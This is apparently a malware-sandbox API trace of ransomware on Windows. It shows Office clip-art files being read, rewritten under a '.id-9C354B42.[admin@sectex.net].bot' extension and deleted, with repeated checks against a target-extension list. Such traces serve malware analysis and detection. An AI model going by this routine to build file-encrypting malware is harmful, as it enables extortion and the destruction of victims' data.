	[0150.888] GetLastError () returned 0x0
	[0150.888] ReadFile (in: hFile=0x3e0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x5f39, lpOverlapped=0x0) returned 1
	[0150.947] WriteFile (in: hFile=0x3d4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x5f40, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x5f40, lpOverlapped=0x0) returned 1
	[0150.948] ReadFile (in: hFile=0x3e0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.948] WriteFile (in: hFile=0x3d4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.949] SetEndOfFile (hFile=0x3d4) returned 1
	[0150.949] CloseHandle (hObject=0x3d4) returned 1
	[0150.949] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.949] SetEndOfFile (hFile=0x3e0) returned 1
	[0150.951] CloseHandle (hObject=0x3e0) returned 1
	[0150.951] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.952] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099147.jpg")) returned 1
	[0150.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63
	[0150.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63
	[0150.952] lstrlenW (lpString=".doc") returned 4
	[0150.952] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0150.952] lstrlenW (lpString=".docx") returned 5
	[0150.952] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1
	[0150.952] lstrlenW (lpString=".pdf") returned 4
	[0150.952] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0150.952] lstrlenW (lpString=".xls") returned 4
	[0150.952] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0150.952] lstrlenW (lpString=".xlsx") returned 5
	[0150.953] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1
	[0150.953] lstrlenW (lpString=".ppt") returned 4
	[0150.953] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0150.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63
	[0150.953] lstrlenW (lpString=".zip") returned 4
	[0150.953] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0150.953] lstrlenW (lpString=".rar") returned 4
	[0150.953] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0150.953] lstrlenW (lpString=".bz2") returned 4
	[0150.953] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0150.953] lstrlenW (lpString=".7z") returned 3
	[0150.953] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0150.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63
	[0150.953] lstrlenW (lpString=".dbf") returned 4
	[0150.953] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0150.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63
	[0150.953] lstrlenW (lpString=".1cd") returned 4
	[0150.953] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0150.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63
	[0150.953] lstrlenW (lpString=".jpg") returned 4
	[0150.953] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0150.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63
	[0150.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63
	[0150.953] lstrlenW (lpString=".doc") returned 4
	[0150.954] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0150.954] lstrlenW (lpString=".docx") returned 5
	[0150.954] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1
	[0150.954] lstrlenW (lpString=".pdf") returned 4
	[0150.954] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0150.954] lstrlenW (lpString=".xls") returned 4
	[0150.954] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0150.954] lstrlenW (lpString=".xlsx") returned 5
	[0150.954] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1
	[0150.954] lstrlenW (lpString=".ppt") returned 4
	[0150.954] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0150.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63
	[0150.954] lstrlenW (lpString=".zip") returned 4
	[0150.954] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0150.954] lstrlenW (lpString=".rar") returned 4
	[0150.954] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0150.954] lstrlenW (lpString=".bz2") returned 4
	[0150.954] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0150.954] lstrlenW (lpString=".7z") returned 3
	[0150.954] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0150.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63
	[0150.954] lstrlenW (lpString=".dbf") returned 4
	[0150.954] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0150.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63
	[0150.954] lstrlenW (lpString=".1cd") returned 4
	[0150.954] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0150.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63
	[0150.954] lstrlenW (lpString=".jpg") returned 4
	[0150.954] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0150.955] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0150.955] lstrlenW (lpString="J0099150.JPG") returned 12
	[0150.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099150.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0150.983] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=21914) returned 1
	[0150.983] CloseHandle (hObject=0x3b0) returned 1
	[0150.984] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099150.jpg")) returned 0x20
	[0150.985] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099150.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099150.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0150.986] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.986] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099150.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0150.987] GetLastError () returned 0x0
	[0150.987] ReadFile (in: hFile=0x3b0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x559a, lpOverlapped=0x0) returned 1
	[0150.989] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x55a0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x55a0, lpOverlapped=0x0) returned 1
	[0150.991] ReadFile (in: hFile=0x3b0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.991] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.991] SetEndOfFile (hFile=0x38c) returned 1
	[0150.991] CloseHandle (hObject=0x38c) returned 1
	[0150.991] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.991] SetEndOfFile (hFile=0x3b0) returned 1
	[0150.993] CloseHandle (hObject=0x3b0) returned 1
	[0150.993] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.994] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099150.jpg")) returned 1
	[0150.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63
	[0150.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63
	[0150.994] lstrlenW (lpString=".doc") returned 4
	[0150.994] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0150.994] lstrlenW (lpString=".docx") returned 5
	[0150.994] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1
	[0150.994] lstrlenW (lpString=".pdf") returned 4
	[0150.994] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0150.994] lstrlenW (lpString=".xls") returned 4
	[0150.994] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0150.994] lstrlenW (lpString=".xlsx") returned 5
	[0150.994] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1
	[0150.995] lstrlenW (lpString=".ppt") returned 4
	[0150.995] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0150.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63
	[0150.995] lstrlenW (lpString=".zip") returned 4
	[0150.995] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0150.995] lstrlenW (lpString=".rar") returned 4
	[0150.995] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0150.995] lstrlenW (lpString=".bz2") returned 4
	[0150.995] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0150.995] lstrlenW (lpString=".7z") returned 3
	[0150.995] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0150.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63
	[0150.995] lstrlenW (lpString=".dbf") returned 4
	[0150.995] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0150.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63
	[0150.995] lstrlenW (lpString=".1cd") returned 4
	[0150.995] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0150.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63
	[0150.995] lstrlenW (lpString=".jpg") returned 4
	[0150.995] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0150.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63
	[0150.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63
	[0150.995] lstrlenW (lpString=".doc") returned 4
	[0150.995] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0150.995] lstrlenW (lpString=".docx") returned 5
	[0150.995] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1
	[0150.995] lstrlenW (lpString=".pdf") returned 4
	[0150.995] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0150.995] lstrlenW (lpString=".xls") returned 4
	[0150.995] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0150.995] lstrlenW (lpString=".xlsx") returned 5
	[0150.995] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1
	[0150.996] lstrlenW (lpString=".ppt") returned 4
	[0150.996] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0150.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63
	[0150.996] lstrlenW (lpString=".zip") returned 4
	[0150.996] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0150.996] lstrlenW (lpString=".rar") returned 4
	[0150.996] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0150.996] lstrlenW (lpString=".bz2") returned 4
	[0150.996] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0150.996] lstrlenW (lpString=".7z") returned 3
	[0150.996] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0150.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63
	[0150.996] lstrlenW (lpString=".dbf") returned 4
	[0150.996] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0150.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63
	[0150.996] lstrlenW (lpString=".1cd") returned 4
	[0150.996] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0150.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63
	[0150.996] lstrlenW (lpString=".jpg") returned 4
	[0150.996] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0150.996] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.996] lstrlenW (lpString="J0099151.WMF") returned 12
	[0150.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099151.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0150.997] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=26086) returned 1
	[0150.997] CloseHandle (hObject=0x3b0) returned 1
	[0150.997] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099151.wmf")) returned 0x20
	[0150.997] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099151.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.997] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099151.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0150.997] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.997] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.997] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099151.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0150.998] GetLastError () returned 0x0
	[0150.998] ReadFile (in: hFile=0x3b0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x65e6, lpOverlapped=0x0) returned 1
	[0151.000] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x65f0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x65f0, lpOverlapped=0x0) returned 1
	[0151.002] ReadFile (in: hFile=0x3b0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0151.002] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0151.002] SetEndOfFile (hFile=0x38c) returned 1
	[0151.002] CloseHandle (hObject=0x38c) returned 1
	[0151.002] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.002] SetEndOfFile (hFile=0x3b0) returned 1
	[0151.005] CloseHandle (hObject=0x3b0) returned 1
	[0151.006] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0151.006] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099151.wmf")) returned 1
	[0151.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63
	[0151.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63
	[0151.007] lstrlenW (lpString=".doc") returned 4
	[0151.007] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0151.007] lstrlenW (lpString=".docx") returned 5
	[0151.007] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0151.007] lstrlenW (lpString=".pdf") returned 4
	[0151.007] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0151.007] lstrlenW (lpString=".xls") returned 4
	[0151.007] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0151.007] lstrlenW (lpString=".xlsx") returned 5
	[0151.007] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0151.007] lstrlenW (lpString=".ppt") returned 4
	[0151.007] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0151.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63
	[0151.007] lstrlenW (lpString=".zip") returned 4
	[0151.007] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0151.007] lstrlenW (lpString=".rar") returned 4
	[0151.007] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0151.008] lstrlenW (lpString=".bz2") returned 4
	[0151.008] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0151.008] lstrlenW (lpString=".7z") returned 3
	[0151.008] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0151.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63
	[0151.008] lstrlenW (lpString=".dbf") returned 4
	[0151.008] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0151.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63
	[0151.008] lstrlenW (lpString=".1cd") returned 4
	[0151.008] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0151.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63
	[0151.008] lstrlenW (lpString=".jpg") returned 4
	[0151.008] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0151.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63
	[0151.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63
	[0151.008] lstrlenW (lpString=".doc") returned 4
	[0151.008] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0151.008] lstrlenW (lpString=".docx") returned 5
	[0151.008] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0151.008] lstrlenW (lpString=".pdf") returned 4
	[0151.008] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0151.008] lstrlenW (lpString=".xls") returned 4
	[0151.008] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0151.008] lstrlenW (lpString=".xlsx") returned 5
	[0151.008] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0151.008] lstrlenW (lpString=".ppt") returned 4
	[0151.008] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0151.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63
	[0151.008] lstrlenW (lpString=".zip") returned 4
	[0151.008] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0151.008] lstrlenW (lpString=".rar") returned 4
	[0151.009] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0151.009] lstrlenW (lpString=".bz2") returned 4
	[0151.009] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0151.009] lstrlenW (lpString=".7z") returned 3
	[0151.009] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0151.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63
	[0151.009] lstrlenW (lpString=".dbf") returned 4
	[0151.009] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0151.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63
	[0151.009] lstrlenW (lpString=".1cd") returned 4
	[0151.009] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0151.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63
	[0151.009] lstrlenW (lpString=".jpg") returned 4
	[0151.009] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0151.009] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0151.009] lstrlenW (lpString="J0099152.JPG") returned 12
	[0151.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099152.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0151.010] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=11694) returned 1
	[0151.010] CloseHandle (hObject=0x3b0) returned 1
	[0151.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099152.jpg")) returned 0x20
	[0151.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099152.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0151.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099152.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0151.010] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.010] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099152.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0151.011] GetLastError () returned 0x0
	[0151.011] ReadFile (in: hFile=0x3b0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2dae, lpOverlapped=0x0) returned 1
